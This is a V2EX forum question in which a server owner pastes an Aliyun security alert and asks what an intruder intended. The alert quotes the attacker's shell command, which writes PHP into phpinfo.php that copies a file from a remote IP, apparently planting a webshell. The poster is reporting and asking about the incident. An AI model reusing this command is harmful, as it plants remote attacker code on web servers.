收到阿里云进程异常行为-访问恶意下载源的报警。请问各位大佬,这个‘大佬’是想做什么?

2019-12-31 15:33:56 +08:00
 Woood
父进程 id:4776
进程 id:4882
用户名:www-data
URL 链接: http://100.43.136.34:1717/shiqi/11.txt
进程路径:/bin/dash
命令行参数:sh -c echo "<?php echo copy("http://100.43.136.34:1717/shiqi/11.txt","phpinfo.php");echo "Gif89a" ?>" >>phpinfo.php
与该 URL 有关联的漏洞:None
事件说明:云盾检测到您的服务器正在尝试访问一个可疑恶意下载源,可能是黑客通过指令从远程服务器下载恶意文件,危害服务器安全。如果该指令不是您自己运行,请及时排查入侵原因,例如查看本机的计划任务、发起对外连接的父子进程。
解决方案:请及时排查告警中提示的恶意 URL,以及所下载的目录下的恶意文件,并及时清理已运行的恶意进程。如果该指令是您自己主动执行的,您可以在控制台点击标记为误报。
2673 次点击
所在节点    问与答
0 条回复

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/633940

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX